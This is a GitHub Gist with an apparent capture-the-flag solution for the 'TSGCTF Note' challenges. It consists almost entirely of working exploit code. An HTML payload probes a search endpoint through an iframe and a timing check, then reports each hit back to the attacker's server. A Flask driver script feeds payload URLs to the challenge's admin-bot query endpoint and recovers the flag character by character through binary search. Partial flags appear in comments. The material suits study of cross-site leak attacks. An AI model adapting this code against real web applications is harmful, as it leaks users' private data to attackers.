Last active
April 27, 2021 18:57
-
-
Save icchy/017ae9bd964a954b92efb277bc736d2b to your computer and use it in GitHub Desktop.
TSGCTF Note (both 1 and 2)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!doctype html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
</head> | |
<body> | |
<iframe name=f width=100 height=100></iframe> | |
<script> | |
const prefix = '__PREFIX__' | |
const chars = '__CHARS__' | |
const re = `${prefix}[${chars}]` | |
const url = `http://34.84.10.25:18365/?${re}`; | |
// const url = `http://34.84.161.130:18364/?${re}`; | |
f.location = url; | |
const check = async () => { | |
await fetch('https://www.materialui.co/materialIcons/navigation/close_black_72x72.png', { | |
mode: "no-cors", | |
}) | |
fetch(`//${document.location.host}/hit/${prefix}/${chars}`) | |
}; | |
setTimeout(check, 400); | |
</script> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from flask import Flask | |
import requests | |
import time | |
app = Flask(__name__) | |
baseurl = 'http://[your_server]' | |
CHARS = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_' | |
@app.route('/payload/<string:prefix>/<string:chars>') | |
def handle_search(prefix, chars): | |
return open('poc.html').read().replace('__PREFIX__', prefix).replace('__CHARS__', chars) | |
@app.route('/hit/<string:prefix>/<string:chars>') | |
def handle_hit(prefix, chars): | |
l = len(chars) | |
if l == 1: | |
l = len(CHARS) | |
chars1, chars2 = CHARS[:l//2], CHARS[l//2:] | |
query(f'/payload/{prefix+chars[0]}/{chars1}') | |
time.sleep(1) | |
query(f'/payload/{prefix+chars[0]}/{chars2}') | |
else: | |
chars1, chars2 = chars[:l//2], chars[l//2:] | |
query(f'/payload/{prefix}/{chars1}') | |
time.sleep(1) | |
query(f'/payload/{prefix}/{chars2}') | |
return 'ok' | |
def query(q): | |
print(q) | |
print(requests.post('http://34.84.10.25:18365/query', data={'url': f'{baseurl}{q}'}).content) | |
# print(requests.post('http://34.84.161.130:18364/query', data={'url': f'{baseurl}{q}'}).content) | |
if __name__ == '__main__': | |
# prefix = 'TSGCTF.5JFJMWOPOPW5E79' # note 2 | |
# prefix = 'TSGCTF.5H4LL_W3_ENCRYP7' # note 1 | |
prefix = 'TSGCTF.' | |
chars = CHARS | |
query(f'/payload/{prefix}/{chars}') | |
app.run() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment